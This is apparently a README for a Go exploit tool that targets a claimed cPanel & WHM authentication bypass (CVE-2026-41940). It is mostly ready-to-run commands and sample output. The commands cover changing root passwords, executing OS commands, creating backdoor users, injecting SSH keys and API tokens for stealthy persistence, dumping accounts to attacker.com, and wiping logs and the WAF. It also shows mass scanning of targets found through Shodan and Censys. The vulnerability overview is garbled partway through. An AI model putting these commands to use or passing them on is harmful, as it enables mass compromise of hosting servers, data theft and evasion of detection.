Share
## https://sploitus.com/exploit?id=BBB9AEDA-89D0-5471-83A7-388934C96DD4
# CVE-2026-41940 Exploit PoC β cPanel & WHM Authentication Bypass
[](https://vulners.com/cve/CVE-2026-41940)
[](https://www.first.org/cvss/)
[](https://golang.org/)
[](https://opensource.org/licenses/MIT)
**Tool by:** [Ishan Oshada](https://ishanoshada.com) | [GitHub](https://github.com/ishanoshada)
> **β οΈ FOR AUTHORIZED SECURITY TESTING ONLY. Unauthorized use is illegal.**

---
## π Table of Contents
- [Vulnerability Overview](#vulnerability-overview)
- [Exploit Chain](#exploit-chain-4-stages)
- [Features](#features)
- [Installation](#installation)
- [Quick Start](#quick-start)
- [Usage Examples](#usage-examples-table)
- [Post-Exploit Actions](#post-exploit-actions)
- [Interactive Shell Commands](#interactive-shell-commands)
- [Mass Scanning with urls.txt](#mass-scanning-with-urlstxt)
- [Output Examples](#output-examples)
- [Options Reference](#options-reference)
- [Affected Versions](#affected-versions)
- [Building for All Platforms](#building-for-all-platforms)
- [FAQ & Troubleshooting](#faq--troubleshooting)
- [Disclaimer](#disclaimer)
- [Author](#author)
---

## Vulnerability Overview
**CVE-2026-41940** is a **CRLF injection** vulnerability in cPanel & WHM (versions /json-api/version` | Verify root access β success = 200 + version data |
---
## Features
- β
**Single & mass scanning** (file input, stdin pipe)
- β
**Threaded scanning** (control concurrency up to 100+ threads)
- β
**Verbose mode** (`--verbose`) β shows full HTTP requests/responses
- β
**JSON output** (autoβsaves when a vulnerable target is found)
- β
**10 postβexploit actions** (see table below)
- β
**Cross-platform** (Windows, Linux, macOS)
- β
**No external dependencies** (only Go standard library)
- β
**Colourful terminal output** with clear boxed results
- β
**Session persistence** β keep-alive mechanism
- β
**Interactive WHM shell** with command history
---
## Installation
### Prerequisites
- Go 1.20 or higher ([Download](https://golang.org/dl/))
### Clone Repository
```bash
git clone https://github.com/ishanoshada/CVE-2026-41940-Exploit-PoC.git
cd CVE-2026-41940-Exploit-PoC
```
### Build Executable
#### Windows
```cmd
go build -o cpanel_sniper.exe main.go
```
#### Linux / macOS
```bash
go build -o cpanel_sniper main.go
chmod +x cpanel_sniper
```
### Run Directly (No Build)
```bash
go run main.go -u https://target.com:2087
```
---
## Quick Start
```bash
# Basic scan
go run main.go -u https://target.com:2087
# List all cPanel accounts
go run main.go -u https://target.com:2087 -action list
# Interactive WHM shell
go run main.go -u https://target.com:2087 -action shell
# Mass scan with urls.txt
go run main.go -l urls.txt -t 20 -o results.json
```
---
## Usage Examples (Table)
| # | Purpose | Command |
|---|---------|---------|
| 1 | **Basic single target scan** | `go run main.go -u https://target.com:2087` |
| 2 | **List all cPanel accounts** | `go run main.go -u https://target.com:2087 -action list` |
| 3 | **Change root password** | `go run main.go -u https://target.com:2087 -action passwd -passwd "NewP@ssw0rd!2006"` |
| 4 | **Execute system command** | `go run main.go -u https://target.com:2087 -action cmd -cmd "id && whoami"` |
| 5 | **Get server information** | `go run main.go -u https://target.com:2087 -action info` |
| 6 | **Create backdoor user** | `go run main.go -u https://target.com:2087 -action adduser -new-user backdoor -new-domain backdoor.com -passwd "Pass123!2006"` |
| 7 | **Create API token (stealthy)** | `go run main.go -u https://target.com:2087 -action apitoken -tokenname mytoken` |
| 8 | **Inject SSH key** | `go run main.go -u https://target.com:2087 -action sshkey -sshkey "ssh-rsa AAAAB3NzaC1yc2E..."` |
| 9 | **Dump & exfiltrate account** | `go run main.go -u https://target.com:2087 -action dumpacct -dumpuser victim -exfil https://attacker.com/upload` |
| 10 | **Wipe logs & cover tracks** | `go run main.go -u https://target.com:2087 -action wipe` |
| 11 | **Interactive WHM shell** | `go run main.go -u https://target.com:2087 -action shell` |
| 12 | **Mass scan from file** | `go run main.go -l urls.txt -t 20 -o results.json` |
| 13 | **Save results to JSON** | `go run main.go -u https://target.com:2087 -o scan_results.json` |
| 14 | **Enable verbose debugging** | `go run main.go -u https://target.com:2087 --verbose` |
| 15 | **Pipe from other tools** | `cat urls.txt \| go run main.go -t 20` |
| 16 | **Increase timeout** | `go run main.go -u https://target.com:2087 -timeout 30` |
---
## Post-Exploit Actions
| Action | Flag | Description | Stealth Level |
|--------|------|-------------|---------------|
| `list` | `-action list` | List all cPanel accounts | Low |
| `passwd` | `-action passwd -passwd NEWPASS` | Change root password (noisy) | High (detectable) |
| `cmd` | `-action cmd -cmd "id"` | Execute OS commands | Medium |
| `info` | `-action info` | Show hostname, load, version | Low |
| `adduser` | `-action adduser -new-user U -new-domain D` | Create backdoor cPanel user | Medium |
| `apitoken` | `-action apitoken [-tokenname NAME]` | Generate persistent API token | **Very Low** |
| `sshkey` | `-action sshkey -sshkey "ssh-rsa..."` | Inject SSH public key into root | **Very Low** |
| `dumpacct` | `-action dumpacct -dumpuser USER -exfil URL` | Backup & exfiltrate account | Medium |
| `wipe` | `-action wipe` | Disable WAF, clear logs, wipe history | **Cover tracks** |
| `shell` | `-action shell` | Interactive WHM shell | Low |
---
## Interactive Shell Commands
Once inside the shell (`-action shell`), use these commands:
| Command | Description | Example |
|---------|-------------|---------|
| `accounts` | List all cPanel accounts | `accounts` |
| `passwd ` | Change root password | `passwd MyNewPass123!2006` |
| `exec ` | Execute system command | `exec "cat /etc/passwd"` |
| `info` | Show server information | `info` |
| `version` | Show cPanel version | `version` |
| `help` | Show available commands | `help` |
| `exit` | Exit shell | `exit` |
---
## Mass Scanning with urls.txt
The repository includes `urls.txt` with **1000 example targets** for mass scanning.
### urls.txt Format
```
https://192.168.1.1:2087
https://192.168.1.2:2087
https://example1.com:2087
https://example2.com:2087
...
```
### Mass Scan Commands
```bash
# Basic mass scan (10 threads)
go run main.go -l urls.txt
# Fast mass scan (50 threads, save results)
go run main.go -l urls.txt -t 50 -o results.json
# Mass scan with post-exploit action
go run main.go -l urls.txt -t 20 -action list -o hacked_servers.json
# Mass scan with verbose output
go run main.go -l urls.txt -t 10 --verbose
# Mass scan with increased timeout (slow networks)
go run main.go -l urls.txt -t 30 -timeout 30
```
### Generate urls.txt Yourself
```bash
# Generate IP range (Linux/macOS)
for i in {1..254}; do echo "https://192.168.1.$i:2087"; done > urls.txt
# Generate IP range (Windows PowerShell)
1..254 | ForEach-Object { "https://192.168.1.$($_):2087" } > urls.txt
# From Shodan
shodan search --fields ip_str,port 'title:"WHM Login"' | awk '{print "https://"$1":"$2}' > urls.txt
# From Censys
censys search 'services.port=2087' | awk '{print "https://"$1":2087"}' > urls.txt
```
---
## Output Examples
### Vulnerable Target Found
```
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β VULNERABLE TARGET DETECTED β
β βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ£
β Target: https://target.example.com:2087 β
β Token: /cpsess1234567890 β
β Version: 11.76.0.22 β
β Session: :od2aMhg5zJeQunUy... β
β API URL: https://target.example.com:2087/cpsess1234567890/json-api/version β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
[+] Action: LIST
β’ User: admin | Domain: example.com
β’ User: backup | Domain: backup.example.com
β’ User: client1 | Domain: client1.com
```
### Summary Output
```
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
SCAN COMPLETE SUMMARY
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Total Targets Scanned: 1000
Vulnerable Targets: 47
Time Elapsed: 125.34 seconds
VULNERABLE TARGETS:
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
1. https://192.168.1.15:2087
Token: /cpsess1111111111
Version: 11.76.0.22
Session: :od2aMhg5zJeQunUy...
2. https://192.168.1.42:2087
Token: /cpsess2222222222
Version: 11.86.0.15
Session: Km2psnYR9w3rRkLU...
3. https://example.com:2087
Token: /cpsess3333333333
Version: 11.118.0.42
Session: Xk9mQrNtPw3sVbLm...
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
[β] Results saved to: results.json
```
---
## Options Reference
| Option | Type | Default | Description |
|--------|------|---------|-------------|
| `-u` | string | - | Target URL (e.g., https://example.com:2087) |
| `-l` | string | - | File with targets (one per line) |
| `-t` | int | 10 | Number of concurrent threads |
| `-action` | string | - | Post-exploit action |
| `-passwd` | string | - | New password (for passwd/adduser) |
| `-cmd` | string | - | Command to execute (for cmd action) |
| `-new-user` | string | - | Username for adduser action |
| `-new-domain` | string | - | Domain for adduser action |
| `-tokenname` | string | - | Name for API token (apitoken action) |
| `-sshkey` | string | - | Public SSH key to inject (sshkey action) |
| `-dumpuser` | string | - | Username to backup (dumpacct action) |
| `-exfil` | string | - | Remote URL for exfiltration (dumpacct action) |
| `-o` | string | - | Output JSON file (auto-saves when found) |
| `--verbose` | bool | false | Show HTTP requests/responses |
| `-h` | bool | false | Show help menu |
---
## Affected Versions
| Branch | Patched Version | Vulnerable < |
|--------|----------------|--------------|
| 11.110 | 11.110.0.97 | 11.110.0.96 |
| 11.118 | 11.118.0.63 | 11.118.0.62 |
| 11.126 | 11.126.0.54 | 11.126.0.53 |
| 11.132 | 11.132.0.29 | 11.132.0.28 |
| 11.134 | 11.134.0.20 | 11.134.0.19 |
| 11.136 | 11.136.0.5 | 11.136.0.4 |
---
## Building for All Platforms
### Windows
```cmd
go build -o cpanel_sniper.exe main.go
cpanel_sniper.exe -u https://target.com:2087
```
### Linux
```bash
go build -o cpanel_sniper main.go
chmod +x cpanel_sniper
./cpanel_sniper -u https://target.com:2087
```
### macOS (Intel)
```bash
GOOS=darwin GOARCH=amd64 go build -o cpanel_sniper_mac_intel main.go
```
### macOS (Apple Silicon M1/M2/M3)
```bash
GOOS=darwin GOARCH=arm64 go build -o cpanel_sniper_mac_m1 main.go
```
### Cross-Compile All Platforms
```bash
# Windows
GOOS=windows GOARCH=amd64 go build -o cpanel_sniper_windows.exe main.go
# Linux
GOOS=linux GOARCH=amd64 go build -o cpanel_sniper_linux main.go
# macOS Intel
GOOS=darwin GOARCH=amd64 go build -o cpanel_sniper_mac_intel main.go
# macOS M1/M2
GOOS=darwin GOARCH=arm64 go build -o cpanel_sniper_mac_m1 main.go
# Linux ARM (Raspberry Pi)
GOOS=linux GOARCH=arm64 go build -o cpanel_sniper_linux_arm64 main.go
```
---
## Directory Structure
```
CVE-2026-41940-Exploit-PoC/
βββ README.md # Documentation
βββ main.go # Main source code
βββ urls.txt # 1000 example targets
βββ go.mod # Go module file
βββ .gitignore # Git ignore file
βββ results.json # Output file (generated)
```
---
## Disclaimer
This tool is for **educational purposes and authorised penetration testing only**.
Unauthorised access to computer systems is illegal under:
- Computer Fraud and Abuse Act (CFAA) - USA
- Computer Misuse Act - UK
- Information Technology Act - India
- Similar laws worldwide
**The author assumes no liability for misuse. Use at your own risk.**
By using this tool, you agree that you have proper authorisation to test the target systems.
---
## Author
**Ishan Oshada**
- π Website: [ishanoshada.com](https://ishanoshada.com)
- π GitHub: [github.com/ishanoshada](https://github.com/ishanoshada)
- π§ Email: ic31908@gmail.com
---

## Support
If you find this tool useful:
- β Star the repository on GitHub
- π Share with security community
- π Report issues via GitHub Issues
---
**Happy Hacking!** π
*Remember: With great power comes great responsibility. Use ethically.*